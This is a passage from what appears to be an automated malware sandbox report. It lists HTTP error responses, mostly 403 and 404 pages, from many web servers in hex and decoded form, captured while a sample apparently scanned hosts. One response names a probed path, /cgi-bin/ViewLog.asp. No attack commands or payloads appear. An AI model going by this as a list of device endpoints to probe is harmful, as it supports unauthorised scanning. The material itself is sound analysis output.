(Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:57:54 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:54 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 229Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4f d1 6a c2 40 10 7c cf 57 6c 7d 37 9b 88 50 1f 96 83 6a 22 0a a9 0d ed 59 f0 f1 f4 56 73 a0 b9 78 77 56 fc fb 5e 22 85 b2 b0 30 bb b3 33 b3 f4 52 7c 2c e4 ae 2e 61 25 df 2b a8 b7 f3 6a bd 80 d1 18 71 5d ca 25 62 21 8b e7 66 92 66 88 e5 66 24 12 6a c2 e5 2c a8 61 a5 23 08 26 9c 59 4c b3 29 6c 6c 80 a5 bd b5 9a f0 39 4c 08 07 12 ed ad 7e f4 77 b9 f8 c7 89 28 a1 4e c8 86 c1 f1 f5 c6 3e b0 86 ed 67 05 78 38 99 f1 de b4 f8 6d f8 5e d9 53 aa 7c 07 77 e5 a1 8d 06 c7 de 00 6c 0b a1 31 1e 3c bb 1f 76 29 61 d7 cb bb d8 94 d6 8e bd 17 6f 9d 3a 44 e5 af 81 00 2a 40 3e 79 4d b3 58 39 d4 d6 05 98 65 84 7f dc 98 73 48 18 e3 f6 9f 25 bf a3 94 19 74 14 01 00 00 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 65 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 09 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 3a 2f 2f 41 4c 54 2d 4e 41 53 31 2e 61 6c 74 65 72 6e 38 2e 6c 6f 63 61 6c 3a 38 33 32 31 2f 27 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: MOj@|Wl}7Pj"YVsxwV^"03R|,.a%+jq]%b!fff$j,a#&YL)ll9L~w(N>gx8m^S|wl1<v)ao:D*@>yMX9esH%t<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="expires" content="0"><script type='text/javascript'>location.href = 'http://ALT-NAS1.altern8.local:8321/';</script></head></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 37 3a 35 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:57:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 301Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Tue, 21 Jun 2022 09:14:14 GMTetag: "999-62b18be6-c4618b25739d3800;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 1159date: Sun, 23 Oct 2022 15:57:55 GMTserver: LiteSpeedplatform: hostingerData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sun, 23 Oct 2022 15:57:55 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:57:55 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:57:58 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:58 GMTServer: Apache/2.4.37 (Red Hat Enterprise Linux) OpenSSL/1.1.1cContent-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/html; charset=iso-8859-1X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:Cache-Control: no-cache,no-storePragma: no-cacheData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:58 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sat, 24 Jan 1970 22:15:11 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 66 75 6e 63 74 69 6f 6e 20 63 61 6e 63 65 6c 65 76 65 6e 74 28 29 7b 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 6e 61 6d 65 2e 73 75 62 6d 69 74 28 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 20 6f 6e 6c 6f 61 64 3d 63 61 6e 63 65 6c 65 76 65 6e 74 28 29 20 3e 3c 48 34 3e 34 30 34 20 